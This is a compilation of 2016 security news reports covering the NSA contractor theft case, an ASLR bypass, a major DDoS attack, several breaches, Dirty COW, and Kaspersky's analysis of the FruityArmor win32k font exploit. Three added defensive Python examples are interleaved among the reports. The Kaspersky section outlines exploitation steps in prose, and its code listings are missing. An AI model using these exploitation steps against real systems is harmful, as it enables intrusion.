According to the NY Times, the FBI has found forensic evidence that the hacking tools leaked online by the group had actually been on Martin’s computer.
Why did the US contractor steal the document?
It is still a mystery. People who know him describe him as patriotic, a circumstance that suggests he would never have given classified information to another country. He never had a specific interest in politics, and the FBI does not rule out that he might have sold the precious information for money.
“His annual salary in recent years has exceeded $100,000 and he owns his house without a mortgage. But he has long bought expensive suits and Rolex watches, according to an old acquaintance, and a person familiar with his finances says he has struggled with debt. Court records show one past lien, an $8,997 state tax bill imposed in 2000 and not paid off until 2014.” reported the NYT.
Martin is due to appear before US Magistrate Judge Beth P. Gesner for his detention hearing today in Baltimore.
Newly discovered vulnerability in Intel chips opens PCs to attacks
21.10.2016 Vulnerabilities
One of the features of Intel’s Haswell series processors can be abused: it makes it possible to overcome one of the important types of protection against infection offered by all the major operating systems.
The technique, discovered by three researchers from the State University of New York and the University of California, can be abused to bypass ASLR (address space layout randomization) protection. ASLR is a security mechanism that places program machine code, libraries and data at randomly chosen addresses in memory. The attacker therefore does not know where to place his malicious code.
The goal of ASLR is to make some kinds of exploits impossible, namely stack or heap overflows, for example. When ASLR is overcome and a vulnerability exploited, the malicious code is inserted at a specific position in memory where the given process or the operating system kernel runs it as a regular part of its operation.
In their study, the researchers describe how the BTB (branch target buffer), a caching mechanism used by the CPU’s branch predictor, can be used to leak ASLR addresses by creating collisions between different user processes or processes in the kernel. The branch target predictor is used in modern processors to optimise performance.
“The BTB stores target addresses of recently executed branch instructions, so that those addresses can be obtained directly from the BTB to fetch instructions starting at the target in the next cycle,” the researchers explain in the study. “Since the BTB is shared by several applications executing on the same core, information leakage from one application to another through the BTB side channel is possible.”
The researchers demonstrated their BTB-based bypass on a computer with an Intel Haswell CPU and a Linux operating system with kernel version 4.5. Their attack reliably recovered the kernel’s ASLR using BTB collisions in approximately 60 milliseconds.
The study itself proposes several software and hardware solutions that would prevent BTB attacks in the future, or better secure current ASLR implementations.
Attackers already have other methods of bypassing ASLR today, but these usually require finding additional memory vulnerabilities and chaining them with the original exploit. Thanks to improvements in software security in recent years, remote execution of malicious code usually requires multi-stage exploits.
Facebook, Twitter and CNN. Major websites became the target of a huge cyber attack
21.10.2016 Novinky/Bezpečnost Cyber attack
Several large international servers became the target of a massive DDoS attack on Friday. The cybercriminals began overloading the websites shortly after 12 noon Central European Time. According to TechCrunch, the attack lasted several hours.
According to initial reports, the computer pirates targeted, for example, the social networks Twitter and Facebook. Overload attempts were also recorded on the news servers Daily News, CNN and the New York Times. The music portals Spotify and Soundcloud did not escape the cybercriminals’ attention either.
According to user reports, at least thousands of people were unable to connect to the affected websites for several hours, RT.com wrote. Their browsers reported that the sites were unavailable.
Spotify Status (@SpotifyStatus), 2:59 PM - 21 Oct 2016: “Uh oh, we’re having some issues right now and investigating. We’ll keep you updated!”
Spotify representatives have already confirmed on Twitter the technical problems that prevented some users from connecting.
However, the websites could not be loaded primarily in the USA. European users, for example, probably did not even notice the cybercriminals’ efforts.
Under the baton of enslaved computers
A DDoS (Distributed Denial of Service) attack always follows the same scenario. Hundreds of thousands of computers, which computer pirates have mostly enslaved and can therefore control remotely, start accessing a specific server at the same moment. The server usually cannot handle such a large number of requests and crashes. To ordinary users, a website attacked in this way then appears unavailable.
Users therefore need not fear that their data on the servers is in any way at risk. The only thing the computer pirates achieved is the unavailability of the services for users.
Even so, the scale of the DDoS attack in this case is alarming. According to RT.com, the cybercriminals managed to knock a really large number of computers out of operation. This suggests that the attack was conducted with a force that security experts have not encountered before.
According to initial estimates, it is thus one of the most massive DDoS attacks in the entire history of the Internet.
The Great Cannon frightens security experts
Who is behind the cyber raid is not yet clear. Security experts had, however, warned several months before the attack that the Chinese have at their disposal a weapon nicknamed the Great Cannon. It is used precisely for DDoS attacks.
According to earlier reports, the Great Cannon should, given its size, be able to knock practically any target on the Internet out of operation.
Some domestic servers also faced DDoS cyber attacks at the beginning of March 2013. They were directed first at news websites, then at the Seznam.cz portal and the servers of banks and telephone operators. Security experts spoke in this connection of the largest attack in the history of the Czech Internet.
Ex-NSA Contractor Stole 50 TB of Classified Data; Includes Top-Secret Hacking Tools
21.10.2016 thehackernews BigBrothers
Almost two months ago, the FBI quietly arrested NSA contractor Harold Thomas Martin III for stealing an enormous number of top secret documents from the intelligence agency.
Now, according to a court document filed Thursday, the FBI seized at least 50 terabytes of data from 51-year-old Martin that he siphoned from government computers over two decades.
The stolen data, at least 500 million pages of government records, include top-secret information about "national defense." If all the data stolen by Martin is indeed found to be classified, it would be the largest NSA heist, far bigger than the Edward Snowden leaks.
According to the new filing, Martin also took "six full bankers’ boxes" worth of documents, many of which were marked "Secret" and "Top Secret." The stolen data also include the personal information of government employees. The stolen documents date from 1996 through 2016.
"The document appears to have been printed by the Defendant from an official government account," the court documents read. "On the back of the document are handwritten notes describing the NSA's classified computer infrastructure and detailed descriptions of classified technical operations."
Former NSA Insider Could Be Behind The Shadow Brokers
It's not clear exactly what Martin allegedly stole, but The New York Times reported Wednesday that the stolen documents also included the NSA's top secret hacking tools posted online by a supposed hacking group, calling itself Shadow Brokers, earlier this year.
Earlier this summer, Shadow Brokers claimed to have infiltrated NSA servers and stolen enormous amounts of data, including working exploits and hacking tools.
The NY Times report suggests that the FBI has found forensic evidence that the hacking tools and cyber-weapons posted online by the alleged hacking group had actually been on a contractor's machine.
NSA Contractor to Face Espionage Charges
Prosecutors said Martin, a former Booz Allen Hamilton staffer like NSA whistleblower Snowden, should remain locked up, and that the government also plans to charge him with violations of the Espionage Act.
If convicted, he could face the death penalty.
Martin has "obtained advanced educational degrees" and has also "taken extensive government training courses on computer security," including in the areas of encryption as well as secure communications.
A former US Navy veteran, Martin allegedly used sophisticated software that "runs without being installed on a computer system and provides anonymous Internet access, leaving no digital footprint on the Machine."
It's believed that Martin was using the TAILS operating system or another USB-bootable operating system in conjunction with Tor or a VPN, which would not leave any forensic evidence of his computer activities.
Martin's motives are still unclear, but among the seized documents, investigators uncovered a letter sent to Martin's colleagues in 2007, in which he criticized the government's information security practices and referred to those same co-workers as "clowns."
The letter reads: "I will leave you with this: if you do not get obnoxious, obvious, and detrimental to my future, then I will not bring you; into the light, as it were. If you do, well, remember that you did it to yourselves."
Martin is due to appear before US Magistrate Judge Beth P. Gesner for his detention hearing on Friday in Baltimore.
MBRFilter — Open Source Tool to Protect Against 'Master Boot Record' Malware
21.10.2016 thehackernews Virus
The ransomware threat has grown so much that ransomware authors have started abusing the MBR in their attacks to lock down your entire computer instead of just encrypting the important files on your hard drive.
Talos team at Cisco Systems has released a free, open-source tool that protects the master boot record (MBR) sector of computers from modification by bootkits, ransomware, and other malicious attacks.
The Master Boot Record (MBR) is the first sector (512 bytes) of your hard drive; it stores the bootloader, the piece of code responsible for booting the installed operating system.
Technically, the bootloader is the first code executed after the system BIOS, and it tells your computer what to do when it starts.
Advanced malware, such as rootkits and bootkits, leverages this process to infect computers by modifying the MBR.
Boot malware, or a bootkit, can install ransomware or other malicious software into your Windows kernel, where it is almost impossible to detect, and thus gain unrestricted and unauthorized access to your entire computer.
So the best way to protect your computer against such bootkits is to prevent unauthorized software from rewriting or overwriting your MBR.
Cisco Talos' free tool does exactly that.
Dubbed MBRFilter, the tool is nothing more than a signed system driver that puts the MBR into a read-only state, preventing any software or malware from modifying the data in the MBR sector.
You can watch the video demonstration of MBRFilter in action.
MBRFilter will safeguard your computer against MBR-targeting malware, like the Petya, Satana, or HDDCryptor ransomware.
"MBRFilter is a simple disk filter based on Microsoft’s diskperf and classpnp example drivers," the team said in a blog post. "It can be used to prevent malware from writing to Sector 0 on all disk devices connected to a system. Once installed, the system will need to be booted into Safe Mode in order for Sector 0 of the disk to become accessible for modification."
MBRFilter is available for both Windows 32-bit and 64-bit platforms, and Cisco has open-sourced its source code on GitHub.
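MBRFilter blocks writes to Sector 0; the complementary defensive step is knowing what Sector 0 contains and noticing when it changes. The following Python is an added example, not code from the article or from MBRFilter: it parses a 512-byte MBR (bootstrap code, four partition entries, 0x55AA signature) and compares a baseline image against a current one. The MBR bytes are constructed samples; on a real system the 512 bytes would be read from the raw disk device (an assumption, and it needs administrator rights).

```python
"""Parse a 512-byte Master Boot Record and fingerprint it for change detection.

Added example, not part of the article or of Cisco Talos' MBRFilter. The MBR
bytes used below are constructed, not read from a real disk.
"""
import hashlib
import struct
from typing import Dict, List

SECTOR_SIZE = 512
BOOT_CODE_SIZE = 446            # bytes 0..445: bootstrap code (plus optional disk signature)
PARTITION_TABLE_OFFSET = 446    # four 16-byte partition entries follow the boot code
PARTITION_ENTRY_SIZE = 16
BOOT_SIGNATURE = b"\x55\xaa"    # last two bytes of a valid MBR


def parse_mbr(sector: bytes) -> Dict:
    """Return the bootstrap-code hash, partition table and signature status of an MBR."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError(f"MBR must be exactly {SECTOR_SIZE} bytes, got {len(sector)}")
    partitions: List[Dict] = []
    for i in range(4):
        off = PARTITION_TABLE_OFFSET + i * PARTITION_ENTRY_SIZE
        # status(1) CHS start(3) type(1) CHS end(3) LBA start(4) sector count(4), little-endian
        status, _chs_start, ptype, _chs_end, lba_start, sectors = struct.unpack(
            "<B3sB3sII", sector[off:off + PARTITION_ENTRY_SIZE])
        if ptype == 0 and sectors == 0:
            continue                       # empty slot
        partitions.append({
            "index": i,
            "bootable": status == 0x80,
            "type": ptype,
            "lba_start": lba_start,
            "sectors": sectors,
        })
    return {
        "valid_signature": sector[510:512] == BOOT_SIGNATURE,
        "boot_code_sha256": hashlib.sha256(sector[:BOOT_CODE_SIZE]).hexdigest(),
        "partitions": partitions,
    }


def mbr_changed(baseline: bytes, current: bytes) -> List[str]:
    """Compare two MBR images and describe what differs (empty list means unchanged)."""
    old, new = parse_mbr(baseline), parse_mbr(current)
    findings = []
    if old["boot_code_sha256"] != new["boot_code_sha256"]:
        findings.append("bootstrap code (bytes 0-445) was rewritten")
    if old["partitions"] != new["partitions"]:
        findings.append("partition table was modified")
    if not new["valid_signature"]:
        findings.append("boot signature 0x55AA is missing")
    return findings


def _build_sample_mbr(boot_code: bytes) -> bytes:
    """Construct a synthetic MBR with one bootable NTFS-type partition (sample data)."""
    code = boot_code.ljust(BOOT_CODE_SIZE, b"\x00")
    entry = struct.pack("<B3sB3sII", 0x80, b"\x00\x00\x00", 0x07, b"\x00\x00\x00", 2048, 1_000_000)
    table = entry + b"\x00" * (PARTITION_ENTRY_SIZE * 3)
    return code + table + BOOT_SIGNATURE


# Constructed baseline and a "tampered" copy whose bootstrap code was replaced,
# which is the kind of change MBR-overwriting ransomware makes to Sector 0.
BASELINE_MBR = _build_sample_mbr(b"\xfa\x33\xc0\x8e\xd0")   # arbitrary sample boot bytes
TAMPERED_MBR = _build_sample_mbr(b"\xeb\x01\x90\xcc\xcc")   # different sample boot bytes


if __name__ == "__main__":
    print(parse_mbr(BASELINE_MBR))
    print(mbr_changed(BASELINE_MBR, TAMPERED_MBR))
```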
Over 43 Million Weebly Accounts Hacked; Foursquare Also Hit By Data Breach
21.10.2016 thehackernews Hacking
2016 is the year of data breaches: almost every major company has fallen victim to cyber attacks, resulting in the compromise of over a billion online user accounts.
Weebly and Foursquare are the latest victims of massive data breaches, joining the list of "Mega-Breaches" revealed in recent months, including LinkedIn, MySpace, VK.com, Tumblr, Dropbox, and the biggest one -- Yahoo.
Details for over 43 Million users have been stolen from the San Francisco-based website building service Weebly, according to breach notification site LeakedSource, which has already indexed a copy of the stolen data that it received from an anonymous source.
In addition, LeakedSource posted details of the cyber attack in a blog post on Thursday explaining what happened. The attack is believed to have been carried out in February 2016.
"Unlike nearly every other hack, the Co-founder and CTO of Weebly Chris Fanini fortunately did not have his head buried deeply in the sand and actually responded to our communication requests," LeakedSource says.
"We have been working with them to ensure the security of their users meaning password resets as well as notification emails are now being sent out."
The stolen data contains personal data of 43,430,316 Weebly customers, which includes usernames, email addresses, passwords, and IP addresses.
Stolen passwords were stored using the strong hashing function "BCrypt," making it difficult for hackers to obtain users' actual passwords.
These password hashes are also believed to have used a salt, a random string added to the hashing process to further strengthen the stored passwords and make them more difficult for hackers to crack.
Weebly confirmed the data breach, saying the company has started notifying affected customers and has already initiated a password reset process and introduced new password requirements.
"Weebly recently became aware that an unauthorized party obtained email addresses and/or usernames, IP addresses and encrypted (bcrypt hashed) passwords for a large number of customers," the company said.
"At this point, we do not have evidence of any customer website being improperly accessed. We do not store any full credit card numbers on Weebly servers, and at this time we’re not aware that any credit card information that can be used for fraudulent charges was part of this incident."
LeakedSource has also published details of a data breach affecting more than 22.5 million customers of location-based check-in service Foursquare, though the company denied the claims.
The Takeaway:
Even if the stolen passwords are difficult to crack, it's still a good idea to change the password for your Weebly account, just to be safe.
Also change the passwords for your other online accounts immediately, especially if you use the same password on multiple websites.
You can also use a good password manager to create and remember complex passwords for different sites. We have listed some of the best password managers, which would help you understand the importance of a password manager and choose one according to your requirements.
The new Dirty COW Linux Kernel Exploit already used in attacks in the wild
21.10.2016 securityaffairs Vulnerebility
Experts disclosed a new Linux kernel vulnerability dubbed Dirty COW that could be exploited by an unprivileged local attacker to escalate privileges.
Security expert Phil Oester discovered a new flaw in the Linux kernel, dubbed ‘Dirty COW’, that could be exploited by a local attacker to escalate privileges.
The name “Dirty COW” is due to the fact that it’s triggered by a race condition in the way the Linux kernel’s memory subsystem handles copy-on-write (COW) breakage of private read-only memory mappings.
According to the security advisory published by Red Hat, the vulnerability, tracked as CVE-2016-5195, allows local attackers to modify existing setuid files.
“A race condition was found in the way the Linux kernel’s memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.” states the Red Hat security advisory.
“This could be abused by an attacker to modify existing setuid files with instructions to elevate privileges. An exploit using this technique has been found in the wild.”
Dirty COW exploit
Red Hat also confirmed that attackers are using an exploit leveraging Dirty COW in the wild.
The good news is that a solution to the issue is already available and Linux distributions have started releasing updates.
There is also a curious aspect to Dirty COW: the researchers who discovered it launched a sort of marketing operation around the issue, creating a website, a logo and a Twitter account. They are also running a shop that sells “Dirty COW” mugs and t-shirts.
Let me close with one of the questions in the FAQ section of the website:
Can my antivirus detect or block this attack?
“Although the attack can happen in different layers, antivirus signatures that detect Dirty COW could be developed. Due to the attack complexity, differentiating between legitimate use and attack cannot be done easily, but the attack may be detected by comparing the size of the binary against the size of the original binary. This implies that antivirus can be programmed to detect the attack but not to block it unless binaries are blocked altogether.”
The researchers also published the exploit code on GitHub.
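The FAQ answer above suggests detecting a Dirty COW-style overwrite of a setuid binary by comparing its size with the original. As an added example (not code from the Dirty COW researchers or from any distribution), the Python below inventories setuid/setgid files, records size, mode and SHA-256 for each, and diffs a later run against that baseline; the hash catches a same-size rewrite that the size comparison alone would miss. The directory roots in the main block are an assumption about the system's layout.

```python
"""Baseline and re-check setuid/setgid binaries to spot a Dirty COW-style rewrite.

Added example, not code from the Dirty COW researchers or any distribution.
"""
import hashlib
import json
import os
import stat
from typing import Dict, Iterable, List


def is_setuid_or_setgid(mode: int) -> bool:
    """True for a regular file with the setuid or setgid bit set."""
    return stat.S_ISREG(mode) and bool(mode & (stat.S_ISUID | stat.S_ISGID))


def find_privileged_binaries(roots: Iterable[str]) -> List[str]:
    """Walk the given directories and return paths of setuid/setgid regular files."""
    found = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)      # lstat: never follow symlinks
                except OSError:
                    continue
                if is_setuid_or_setgid(st.st_mode):
                    found.append(path)
    return sorted(found)


def fingerprint(paths: Iterable[str]) -> Dict[str, Dict]:
    """Record size, permission bits and SHA-256 for each path."""
    result = {}
    for path in paths:
        st = os.lstat(path)
        h = hashlib.sha256()
        with open(path, "rb") as f:
            for chunk in iter(lambda: f.read(1 << 20), b""):
                h.update(chunk)
        result[path] = {
            "size": st.st_size,
            "mode": oct(stat.S_IMODE(st.st_mode)),
            "sha256": h.hexdigest(),
        }
    return result


def compare(baseline: Dict[str, Dict], current: Dict[str, Dict]) -> Dict[str, List[str]]:
    """Diff two fingerprints: changed (size/mode/contents), added and removed files."""
    changed = []
    for path, old in baseline.items():
        new = current.get(path)
        if new is None:
            continue
        diffs = [k for k in ("size", "mode", "sha256") if old[k] != new[k]]
        if diffs:
            changed.append(f"{path}: {', '.join(diffs)} changed")
    return {
        "changed": changed,
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
    }


def save_baseline(fp: Dict[str, Dict], out_path: str) -> None:
    with open(out_path, "w") as f:
        json.dump(fp, f, indent=2, sort_keys=True)


def load_baseline(in_path: str) -> Dict[str, Dict]:
    with open(in_path) as f:
        return json.load(f)


if __name__ == "__main__":
    # Typical use: run once right after patching to write the baseline, then re-run
    # periodically. The roots are an assumption; adjust to the distribution's layout.
    roots = ["/usr/bin", "/usr/sbin", "/bin", "/sbin"]
    current = fingerprint(find_privileged_binaries(roots))
    if os.path.exists("setuid-baseline.json"):
        print(json.dumps(compare(load_baseline("setuid-baseline.json"), current), indent=2))
    else:
        save_baseline(current, "setuid-baseline.json")
        print(f"baseline written for {len(current)} privileged binaries")
```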
FruityArmor APT exploited Windows Zero-Day flaws in attacks in the wild
21.10.2016 securityaffairs APT
Experts from Kaspersky have discovered a new APT group, dubbed FruityArmor, using a zero-day vulnerability patched this month by Microsoft.
A new APT group, dubbed FruityArmor, targeted activists, researchers, and individuals related to government organizations.
According to experts at Kaspersky Lab, the FruityArmor APT conducted targeted attacks leveraging a Windows zero-day vulnerability, tracked as CVE-2016-3393, recently patched by Microsoft.
The security bulletins issued by Microsoft in October patched four zero-day flaws, including CVE-2016-3393, which is a remote code execution vulnerability.
The experts have observed victims in different countries, including Iran, Algeria, Thailand, Yemen, Saudi Arabia and Sweden.
According to Kaspersky Lab, the hackers behind FruityArmor exploited several zero-day vulnerabilities and used an attack platform built around the Microsoft PowerShell framework.
“FruityArmor is perhaps a bit unusual due to the fact that it leverages an attack platform that is built entirely around PowerShell. The group’s primary malware implant is written in PowerShell and all commands from the operators are also sent in the form of PowerShell scripts.” reads a blog post published on Thursday by Kaspersky.
Another peculiarity of the group is the use of the Windows Management Instrumentation (WMI) for persistence.
The malicious code used by the APT is hard to detect; the experts from Kaspersky highlighted that its payloads run directly in memory.
According to the experts, the FruityArmor APT group exploits the zero-day flaw for privilege escalation, which, combined with browser exploits, allows the attackers to escape the browser sandbox.
“To achieve remote code execution on a victim’s machine, FruityArmor normally relies on a browser exploit. Since many modern browsers are built around sandboxes, a single exploit is generally not sufficient to allow full access to a targeted machine.” reads the blog post.
“In the case of FruityArmor, the initial browser exploitation is always followed by an EoP exploit. This comes in the form of a module, which runs directly in memory. The main goal of this module is to unpack a specially crafted TTF font containing the CVE-2016-3393 exploit. After unpacking, the module directly loads the code exploit from memory with the help of AddFontMemResourceEx. After successfully leveraging CVE-2016-3393, a second stage payload is executed with higher privileges to execute PowerShell with a meterpreter-style script that connects to the C&C.”
For further details, take a look at the Kaspersky analysis.
Weebly data breach affected more than 43 million customers
21.10.2016 securityaffairs Crime
Weebly, a San Francisco-based drag-and-drop website creator, will start sending notification letters to all of its customers after a data breach.
Another data breach is in the headlines: Weebly and Foursquare are the latest victims of massive data breaches.
According to data breach notification site LeakedSource, hackers compromised the details of over 43 Million users.
“Well known San-Francisco based “drag-n-drop” website creator Weebly.com had information on 43,430,316 users leaked from its main database in February of 2016. This database was provided to us by an anonymous source.” reads the blog post published by LeakedSource.
“Each record in this mega breach contains a username, email address, password, and IP address.”
The company confirmed the data breach and also informed LeakedSource that it has started notifying affected customers and initiated a password reset process.
LeakedSource also provided details of the cyber attack, which seems to date back to February 2016, confirming the massive impact of the incident.
“This mega breach affects not only tens of millions of users but tens of millions of websites and with Weebly being one of the most popular hosting platforms in the world, this breach could have been far more disastrous in the wrong hands had they not strongly hashed passwords.”
Weebly stored passwords with uniquely salted bcrypt hashing, making it hard for attackers to obtain users' actual passwords.
“Weebly recently became aware that an unauthorized party obtained email addresses and/or usernames, IP addresses and encrypted (bcrypt hashed) passwords for a large number of customers,” the company said.
“At this point, we do not have evidence of any customer website being improperly accessed. We do not store any full credit card numbers on Weebly servers, and at this time we’re not aware that any credit card information that can be used for fraudulent charges was part of this incident.”
Weebly is the latest company to join the list of recently revealed massive data breaches, a long list that includes IT giants like LinkedIn, MySpace, VK.com, Dropbox, and Yahoo.
Massive ATM Hack Hits 3.2 Million Indian Debit Cards — Change Your PIN Now!
20.10.2016 thehackernews Hacking
India is undergoing its biggest data breach to date, with as many as 3.2 Million debit card details reportedly stolen from multiple banks and financial platforms.
The massive financial breach has hit India's biggest banks including State Bank of India (SBI), HDFC Bank, Yes Bank, ICICI Bank and Axis, and customers are advised to change their ATM PIN immediately.
Hackers allegedly used malware to compromise the Hitachi Payment Services platform — which powers the country's ATMs, point-of-sale (PoS) machines and other financial transactions — and stole the details of 3.2 Million debit cards, reports The Economic Times.
Of the 3.2 Million debit cards, 2.6 Million are powered by Visa or Mastercard and the remaining 600,000 work on India’s own RuPay platform.
Hacked Debit Cards Reportedly Used in China
It is not yet clear who is behind the cyber attack, but the report adds that a number of affected customers have observed unauthorized transactions made with their cards in various locations in China.
Some banks, including the country's biggest lender SBI, have announced that they'll replace compromised debit cards, while other banks, including HDFC Bank, have urged their customers to change their ATM PINs and avoid using other banks' ATMs.
The extent of the damage from the breach also depends on the type of card customers are using.
Cards that use a magnetic stripe transmit your account number and secret PIN to merchants in a way that makes it easy for fraudsters to capture them, making these cards easier to clone.
EMV (Europay, MasterCard, and Visa) chip-equipped cards (better known as Chip-and-PIN cards), by contrast, store your data in encrypted form and only transmit a unique code (a one-time-use token) for every transaction, making these cards more secure and a lot harder to clone.
SBI Blocks and will Re-Issue 600,000 Debit Cards
SBI has blocked affected debit cards and will re-issue over 600,000 cards. Here's what SBI CTO Shiv Kumar Bhasin told the publication:
"It's a security breach, but not in our bank's systems. Many other banks also have this breach—right now and since a long time. A few ATMs have been affected by malware. When people use their card on infected switches or ATMs, there is a high probability that their data will be compromised."
Mastercard also denied that its systems were breached, issuing the following statement:
"We're aware of the data compromise event. To be clear, Mastercard's own systems have not been breached. At Mastercard, safety and security of payments are a top priority for us and we're working on the investigations with the regulators, issuers, acquirers, global and local law enforcement agencies and third party payment networks to assess the current situation."
Meanwhile, the Payments Council of India has ordered a forensic audit on the Indian bank servers to measure the damage and investigate the origin of the cyber attack. Bengaluru-based payment and security specialist SISA will conduct the forensic audit.
Windows zero-day exploit used in targeted attacks by FruityArmor APT
20.10.2016 Kaspersky Vulnerebility
A few days ago, Microsoft published the “critical” MS16-120 security bulletin with fixes for vulnerabilities in Microsoft Windows, Microsoft Office, Skype for Business, Silverlight and Microsoft Lync.
One of the vulnerabilities – CVE-2016-3393 – was reported to Microsoft by Kaspersky Lab in September 2016.
Here’s a bit of background on how this zero-day was discovered. A few months ago, we deployed a new set of technologies in our products to identify and block zero-day attacks. These technologies proved their effectiveness earlier this year, when we discovered two Adobe Flash zero-day exploits – CVE-2016-1010 and CVE-2016-4171. Two Windows EoP exploits have also been found with the help of this technology. One is CVE-2016-0165. The other is CVE-2016-3393.
Like most zero-day exploits found in the wild today, CVE-2016-3393 is used by an APT group we call FruityArmor. FruityArmor is perhaps a bit unusual due to the fact that it leverages an attack platform that is built entirely around PowerShell. The group’s primary malware implant is written in PowerShell and all commands from the operators are also sent in the form of PowerShell scripts.
In this report we describe the vulnerability that was used by this group to elevate privileges on a victim’s machine. Please keep in mind that we will not be publishing all the details about this vulnerability because of the risk that other threat actors may use them in their attacks.
Attack chain description
To achieve remote code execution on a victim’s machine, FruityArmor normally relies on a browser exploit. Since many modern browsers are built around sandboxes, a single exploit is generally not sufficient to allow full access to a targeted machine. Most of the recent attacks we’ve seen that rely on a browser exploit are combined with an EoP exploit, which allows for a reliable sandbox escape.
In the case of FruityArmor, the initial browser exploitation is always followed by an EoP exploit. This comes in the form of a module, which runs directly in memory. The main goal of this module is to unpack a specially crafted TTF font containing the CVE-2016-3393 exploit. After unpacking, the module directly loads the code exploit from memory with the help of AddFontMemResourceEx. After successfully leveraging CVE-2016-3393, a second stage payload is executed with higher privileges to execute PowerShell with a meterpreter-style script that connects to the C&C.
EOP zero-day details
The vulnerability is located in the cjComputeGLYPHSET_MSFT_GENERAL function from the Win32k.sys system module. This function parses the cmap table and fills internal structures. The CMAP structure looks like this:
The most interesting parts of this structure are two arrays – endCount and startCount. The exploit contains the following cmap table with segments:
To compute how much memory to allocate to internal structures, the function executes this code:
After computing this number, the function allocates memory for structures in the following way:
The problem is that if we sum over the entire table, we get an integer overflow and the cnt variable ends up with an incorrect value.
In the kernel, we see the following:
The code allocates memory for only 0x18 InternalStruct entries, but then loops over the whole segment range (a value taken directly from the file):
Using the cmap table, the v44 variable (index) could be controlled and, as a result, we get memory corruption. To achieve it, the attacker can do the following:
Make an integer overflow in win32k!cjComputeGLYPHSET_MSFT_GENERAL
Make specific segment ranges in the font file to access interesting memory.
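The report deliberately omits the kernel's arithmetic, but the invariants a well-formed cmap format 4 table must satisfy are public, and a font pipeline can check them before the parser above ever sees the data. The Python below is an added example, not Kaspersky's or Microsoft's code: it parses the format 4 segment arrays, recomputes the per-segment count with unbounded integers, and flags unsorted or overlapping segments and a sum larger than the 65,536 code points of the BMP, which only overlapping segments can produce. Both subtables are constructed samples, not the exploit font.

```python
"""Sanity-check a TrueType cmap format 4 subtable before it reaches the font engine.

Added example, not Kaspersky's or Microsoft's code. The subtables at the bottom are
constructed samples. Format 4 layout (big-endian): format, length, language,
segCountX2, searchRange, entrySelector, rangeShift, endCode[segCount],
reservedPad, startCode[segCount], idDelta[segCount], idRangeOffset[segCount].
"""
import struct
from typing import Dict, List, Tuple

BMP_CODE_POINTS = 0x10000   # a cmap cannot map more distinct 16-bit code points than this


def _u16s(data: bytes, pos: int, n: int, signed: bool = False) -> List[int]:
    """Read n consecutive big-endian 16-bit values starting at pos."""
    code = "h" if signed else "H"
    return list(struct.unpack(f">{n}{code}", data[pos:pos + 2 * n]))


def parse_cmap_format4(data: bytes) -> Dict:
    """Parse the header and the four parallel segment arrays of a format 4 subtable."""
    if len(data) < 14:
        raise ValueError("subtable too short for a format 4 header")
    fmt, length, language, seg_x2, *_ = struct.unpack(">7H", data[:14])
    if fmt != 4:
        raise ValueError(f"not a format 4 subtable (format={fmt})")
    if seg_x2 % 2:
        raise ValueError("segCountX2 must be even")
    seg_count = seg_x2 // 2
    if len(data) < 16 + 8 * seg_count:       # header + reservedPad + four arrays
        raise ValueError("subtable truncated: segment arrays exceed available bytes")
    return {
        "length": length,
        "language": language,
        "segCount": seg_count,
        "endCode": _u16s(data, 14, seg_count),
        "startCode": _u16s(data, 16 + 2 * seg_count, seg_count),   # skips reservedPad
        "idDelta": _u16s(data, 16 + 4 * seg_count, seg_count, signed=True),
        "idRangeOffset": _u16s(data, 16 + 6 * seg_count, seg_count),
    }


def validate_segments(table: Dict) -> Tuple[int, List[str]]:
    """Return (sum of per-segment counts, list of violated invariants)."""
    problems = []
    starts, ends = table["startCode"], table["endCode"]
    total = 0
    for i, (s, e) in enumerate(zip(starts, ends)):
        if s > e:
            problems.append(f"segment {i}: startCode 0x{s:04X} > endCode 0x{e:04X}")
        if i and ends[i - 1] >= e:
            problems.append(f"segment {i}: endCode not strictly increasing")
        if i and s <= ends[i - 1]:
            problems.append(f"segment {i}: overlaps previous segment")
        total += max(0, e - s + 1)   # Python ints do not wrap, unlike a fixed-width kernel counter
    if ends and ends[-1] != 0xFFFF:
        problems.append("last endCode must be 0xFFFF")
    if total > BMP_CODE_POINTS:
        problems.append(f"segment counts sum to {total}, more than the BMP holds: segments overlap")
    return total, problems


def build_format4(segments: List[Tuple[int, int]]) -> bytes:
    """Construct a minimal format 4 subtable from (startCode, endCode) pairs (sample data)."""
    n = len(segments)
    header = struct.pack(">7H", 4, 16 + 8 * n, 0, 2 * n, 0, 0, 0)
    ends = struct.pack(f">{n}H", *[e for _, e in segments])
    starts = struct.pack(f">{n}H", *[s for s, _ in segments])
    deltas = struct.pack(f">{n}h", *([0] * n))
    offsets = struct.pack(f">{n}H", *([0] * n))
    return header + ends + b"\x00\x00" + starts + deltas + offsets


# Constructed samples: a well-formed three-segment table, and a malformed one whose
# segments overlap and run backwards, the kind of input this check should reject.
GOOD_CMAP = build_format4([(0x0020, 0x007E), (0x00A0, 0x00FF), (0xFFFF, 0xFFFF)])
BAD_CMAP = build_format4([(0x0000, 0xFFFF), (0x0000, 0xFFFF), (0x1000, 0x0FFF)])


if __name__ == "__main__":
    for name, blob in (("good", GOOD_CMAP), ("bad", BAD_CMAP)):
        total, problems = validate_segments(parse_cmap_format4(blob))
        print(name, total, problems or "OK")
```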
What about Windows 10? As most of you know, the font processing in Windows 10 is performed in a special user mode process with restricted privileges. This is a very good solution but the code has the same bug in the TTF processing.
As a result, if you load/open this font exploit in Windows 10, you will see fontdrvhost.exe crash:
Kaspersky Lab detects this exploit as:
HEUR:Exploit.Win32.Generic
PDM:Exploit.Win32.Generic
We would like to thank Microsoft for their swift response in closing this security hole.
* More information about the FruityArmor APT group is available to customers of Kaspersky Intelligence Services. Contact: intelreports@kaspersky.com
Experts devised a method to capture keystrokes during Skype calls
20.10.2016 securityaffairs Security
A group of security experts discovered that the Microsoft Skype Messaging service exposes user keystrokes during a conversation.
A group of researchers from the University of California Irvine (UCI) and two Italian universities discovered that the popular Skype messaging service exposes user keystrokes during a call.
The researchers have devised a method to record the acoustic emanations of computer keyboards during a Skype call and reassemble them into text.
The method leverages profiling of the user’s typing style and doesn’t require proximity to the victim in order to capture keystrokes.
The experts devised a new keyboard acoustic eavesdropping attack based on Voice-over-IP (VoIP).
